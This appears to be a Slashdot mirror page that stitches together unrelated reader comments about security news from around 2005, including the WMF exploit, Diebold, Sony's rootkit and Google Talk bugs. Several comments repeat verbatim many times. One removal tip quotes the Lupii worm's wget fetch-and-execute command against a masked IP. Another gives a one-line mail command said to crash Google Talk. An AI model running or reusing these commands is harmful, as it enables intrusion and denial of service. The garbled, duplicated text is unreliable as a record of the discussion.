Slashdot Mirror

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

Yeah, I thought Linux was perfect. I could keep going on forever. But I won't.

I moved to a player with a good media library years ago. Even if that's not for you, consider something like Foobar2000.

SecurityFocus just posted an excellent interview with Fyodor about the 4.00 release. Topics include speed benchmarks, version detection improvement details, the upcoming new OS detection system, and reactions to Nessus going proprietary.

It's not like they're idiots either. They obviously are aware of what the Internet and Wikipedia are. And this link:
http://en.wikipedia.org/wiki/IP_address
goes to this one:
http://www.securityfocus.com/infocus/1674

The workaround is trivial; using mod_rewrite, which is compiled into
Oracle's Apache distribution it is possible to stop the attack. The
workaround checks a user's web request for the presence of a right facing
bracket, ')'.

Add the following four lines to your http.conf file then stop and restart
the web server

RewriteEngine on
RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack

There has been info about Samba 4 for some time. Andrew Bartlett wrote a year ago an interesting thesis about Samba 4 and Active Directory (PDF).

But the release of this TP is good news, I hope that the use of Microsoft's Active Directory as an authentication service for Linux systems is coming to an end. All what we need now is a nice GUI.

Let me guess: You're a CS major, or you are repeating what you heard from a CS major?

We're not anywhere close to approaching the theoretical limits of information security. All you need to do is to subscribe to any number of security announcement mailing lists (e.g. BugTraq or debian-security-announce) and you will see that the number of buffer overflows, arbitrary SQL injection vulnerabilities, and /tmp races -- problems for which solutions have been well-known for years if not decades -- is simply appalling. Heck, just look at the anti-virus industry (and more recently, the anti-spyware industry), something that would not exist if it weren't for the abysmally poor design of today's computing environments.

At least until we get these problems under control, I'm not interested in hearing sermons about Turing completeness, covert channels, and the theoretical futility of ideal information security.

I won't get into the political side of this thread, but I will say this. You views of Diebold are incorrect. Do I believe they have sloppy security and don't care to fix it? Absolutely. Do I believe they chose Windows XP and are using it as a flimsy excuse to not provide the source code of their machines to the state of North Carolina? You bet. But don't for a minute think that Diebold knows anything about security.

You say that Diebold's ATM machines haven't been broken, and not for lack of being a juicy target. You're right, an ATM machine might be a juicy target. But you would have to know way more than the workings of Windows XP in order to extract cash from them. But the main reason you haven't seen them broken into? Because they're not on the Internet. The banking ATM network is a completely separate network, or so I have been told by a friend who is the IT manager at a local bank. There's the Internet, there's the bank's internal network, and then there's the ATM network (not to be confused with the ATM protocol).

But just to show how secure Diebold's ATM machines are, take a look at this article: Nachi worm infected Diebold ATMs. These guys *ARE* a bunch if inept oafs who have no businesses in the banking or voting industries.

Typically it's unusual to see ``just a crash.'' Most programmes written in C and C++ crash due to buffer overflows, which frequently lead to running unsigned code. As a general rule, if a C or C++ code crashes, it is a fairly likely possibility to be able to run arbitrary code. Just because nobody's done it yet doesn't mean that it's not possible.

If you actually code for a living you should stop right now. (living or coding, either way works for me).

The bugs demonstrated here are not buffer overflows. They are the other kind of common C/C++ bug, namely an invalid (in this case NULL) pointer dereference. Null pointer dereferencing bugs are rarely exploitable.

Sorry, but they're not null pointer dereferences, they're both integer errors which cause wacky but non-exploitable behaviour. For those who speak some assembly (clearly nobody in this subthread) the author's analysis can be found here:

http://www.securityfocus.com/archive/1/421257/30/3 0/threaded

There's another debunking over at SecurityFocus

Not anyone like, say, the US Navy, for example:

http://wired-vig.wired.com/news/technology/0,1282, 13758,00.html

Or air traffic controllers:

http://www.techworld.com/opsys/news/index.cfm?News ID=2275

Or nuclear power plants:

http://www.securityfocus.com/news/6767

Regardless of how you rate the intelligence of the parties involved in these little incidents I think you'll find that Windows is very often deployed in mission critical areas.

And yes, often with catastrophic consequences. >)

Yes, because we all know Linux, BSD, OS X have never, ever had security flaws.

Yes, because we all know Linux, BSD, OS X have never, ever had security flaws.

Yes, because we all know Linux, BSD, OS X have never, ever had security flaws.

You don't, maybe somebody else does.

Maybe somebody is going to head over to http://www.securityfocus.com/vulnerabilities and notice that there are forty or fifty vulnerabilities listed for the software that I was able to identify versions of. Maybe somebody will be kind enough to notify the people about their insecure box. But since there isn't any contact info directly on the site...

Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution

http://www.securityfocus.com/bid/16074
http://www.microsoft.com/technet/security/advisory /912840.mspx
http://www.symantec.com/avcenter/venc/data/pf/pwst eal.bankash.g.html

And not only does the exploit work with .WMF (Windows MetaFile), but if the attacker renames it to, say, .JPG, Windows will detect this a really being a .WMF, and STILL execute it. Pretty serious stuff. See this bugtraq link for details.

Since last time it has been reportet that this can also be exploited by renaming infected wmf files to other image formats like jpg, gif and tif:
http://www.securityfocus.com/archive/1/420378/30/0 /threaded

From the security focus posting (http://www.securityfocus.com/bid/16074/discuss):

"The issue may be exploited remotely or by a local attacker. Any code execution that occurs will be with SYSTEM privileges due to the nature of the affected engine."

Under this circumstance I would expect that having a limited user account will not offer you any degree of protection, as the malware is running at system level.

F_T

I'd read this before you take your chances, because it appears as though the exploit will work when the .wmf is disguised as a .jpg (or other extensions)

It's completely new. The WMF patch released before does not protect against this exploit.

http://www.securityfocus.com/bid/16074

From November 8th: http://www.securityfocus.com/bid/15352

New metasploit plugin = new exploit
New metasploit plugin != new vulnerability

I'm pleased that they're using HDCP as it's been cracked already.
http://www.securityfocus.com/news/236

Its going to be really interesting to see how successful the new consortium is in forcing US copyright legislation on the rest of the world.

Or, perhaps, hardware not made in the US, or for US export only, will have versions of the interface that don't include DHCP. Gee. I wonder how long it will take for US consumers to buy their hardware from outside the US instead.

• The actual article on SecurityFocus (not the abbreviated discussion article referenced in TFS).
  
• The full text of the auction, courtesy of the good folks at the OSVDB blog.
  
• The screenie of the actual eBay auction, again courtesy of OSVDB.

The lot: One 0-day Microsoft Excel Vulnerability

Up for sale is one (1) brand new vulnerability in the Microsoft Excel application. The vulnerability was discovered on December 6th 2005, all the details were submitted to Microsoft, and the reply was received indicating that they may start working on it. It can be assumed that no patch addressing this vulnerability will be available within the next few months. So, since I was unable to find any use for this by-product of Microsoft developers, it is now available for you at the low starting price of $0.01 (a fair value estimation for any Microsoft product).

A percentage of this sale will be contributed to various open-source projects.

1. As the seller did in fact report this vulerability to Microsoft first, would his subsequent attempt to call attention to the vulnerability by posting it for auction on eBay be considered 'irresponsible'?
   
2. Exactly which eBay rule did this auction break?

As opposed to say, perl, right?

While perl security has gotten better, it is still a problem. perl is still widely exploited, formmail.pl is one of the more infamous ones. lusers just download whatever script they find off the web and install it, and get quickly compromised.

Are the majority of perl users well versed in perl security? I doubt it.

What, you going to recommend people use C instead of PHP then? python? Even java has issues.

It's very fashionable, hip and trendy to bash PHP on /., while ignoring the fact most other languages really aren't any better.

As opposed to say, perl, right?

While perl security has gotten better, it is still a problem. perl is still widely exploited, formmail.pl is one of the more infamous ones. lusers just download whatever script they find off the web and install it, and get quickly compromised.

Are the majority of perl users well versed in perl security? I doubt it.

What, you going to recommend people use C instead of PHP then? python? Even java has issues.

It's very fashionable, hip and trendy to bash PHP on /., while ignoring the fact most other languages really aren't any better.

As opposed to say, perl, right?

While perl security has gotten better, it is still a problem. perl is still widely exploited, formmail.pl is one of the more infamous ones. lusers just download whatever script they find off the web and install it, and get quickly compromised.

Are the majority of perl users well versed in perl security? I doubt it.

What, you going to recommend people use C instead of PHP then? python? Even java has issues.

It's very fashionable, hip and trendy to bash PHP on /., while ignoring the fact most other languages really aren't any better.

Is apple normally slow with updates?

The SUDO flaw was discovered in June 2005 and a patch was released subsequently after...

So 6 months later, Apple decicdes to update their OS? WTF!?!?!

http://www.securityfocus.com/archive/1/402741

Seems that more and more security researchers are turning their attention to Google these days. There has been a spate of recent bugs published to the usual mailing lists in past weeks.

Title: Google Talk Denial of Service - BenjiBug
Google Talk's automatic update mechanism (which can't be turned off) checks to see if the downloaded file matches a signature, but it doesn't check the size of the file. So it can be forced to compute a hash of a 1 gig file, crashing the machine.

Killer Empty Sender Message
echo kill | nail -s Kill -r "" victim (at) gmail (dot) com [email concealed]
crashes Google Talk

Google Talk cleartext proxy credentials vulnerability
Google Talk stores the GMail login details securely, but not the proxy authentication credentials

Not to mention the GMail bug discussed on /. recently

Ah, the perpetual beta..

Seems that more and more security researchers are turning their attention to Google these days. There has been a spate of recent bugs published to the usual mailing lists in past weeks.

Title: Google Talk Denial of Service - BenjiBug
Google Talk's automatic update mechanism (which can't be turned off) checks to see if the downloaded file matches a signature, but it doesn't check the size of the file. So it can be forced to compute a hash of a 1 gig file, crashing the machine.

Killer Empty Sender Message
echo kill | nail -s Kill -r "" victim (at) gmail (dot) com [email concealed]
crashes Google Talk

Google Talk cleartext proxy credentials vulnerability
Google Talk stores the GMail login details securely, but not the proxy authentication credentials

Not to mention the GMail bug discussed on /. recently

Ah, the perpetual beta..

Seems that more and more security researchers are turning their attention to Google these days. There has been a spate of recent bugs published to the usual mailing lists in past weeks.

Title: Google Talk Denial of Service - BenjiBug
Google Talk's automatic update mechanism (which can't be turned off) checks to see if the downloaded file matches a signature, but it doesn't check the size of the file. So it can be forced to compute a hash of a 1 gig file, crashing the machine.

Killer Empty Sender Message
echo kill | nail -s Kill -r "" victim (at) gmail (dot) com [email concealed]
crashes Google Talk

Google Talk cleartext proxy credentials vulnerability
Google Talk stores the GMail login details securely, but not the proxy authentication credentials

Not to mention the GMail bug discussed on /. recently

Ah, the perpetual beta..

moron.

We are aware that a computer virus is circulating that may affect computers with XCP content protection software. The XCP software is included on a limited number of SONY BMG content protected titles. This potential problem has no effect on the use of these discs in conventional, non-computer-based, CD and DVD players.

In response to these events, SONY BMG has swiftly provided a patch to all major anti-virus companies and to the general public that guards against precisely the type of virus now said to exist. The patch fixes the possible software problem, and still allows CDs to be played on personal computers. It can be downloaded at http://cp.sonybmg.com/xcp/. Starting today, we will also be adding this link to the SONY BMG label and corporate sites. We deeply regret any possible inconvenience this may cause.

We stand by content protection technology as an important tool to protect our intellectual property rights and those of our artists. Nonetheless, as a precautionary measure, SONY BMG is temporarily suspending the manufacture of CDs containing XCP technology. We also intend to re-examine all aspects of our content protection initiative to be sure that it continues to meet our goals of security and ease of consumer use. More information about our content protection initiative can also be found at: http://cp.sonybmg.com/xcp.

step one go to securityfocus and update all of the applications listed on your system.
Symptoms
Presence of the following file:
* /tmp/lupii
One of the following ports are listening:
        * UDP 7111
        * UDP 7222
so running su -c"netstat --listening --extend --program" tells you if its even running by listing what listening to any port such as UDP 7111 7222
then it would be easy to
su -c"kill -9 pid-of-lupii" su -c"rm /tmp/lupii" su -c"touch tmp/lupii"

the worm appearent does this
echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*
so unless your server has a vulnerability that allows privailige escalation from nobody its stuck in tmp directories or possibly in your html directories.

This list is affected: http://www.securityfocus.com/bid/14088/info

Security Focus eWeek CNet

Put very simply, if Sony wants to charge $10 then they're going to have to bend over backwards on this.

A new release DVD cost, lets assume, $20.

$20 New DVD
$02 But I don't get packaging. Minus $2.
$01 I don't get fixed media. I have to store this myself. Minus $1
$05 DRMed to hell! I can't make backups! Minus $5.
$05 I have to download it and pay for the bandwidth. Minus $5.
----
$8

Well there's the $8. Now if they don't screw up ANYTHING else that's fine and I'd probably buy it... but only for a new DVD. No way would I shell out $8 for a DRM copy of 2001 or something. God help them if they install rootkits.

On a related note - I assume everyone saw the rather clever exploit for WoW using the Sony rootkit? If not, security focus has it.

Yeah, and do you also know who is controlling AJAX?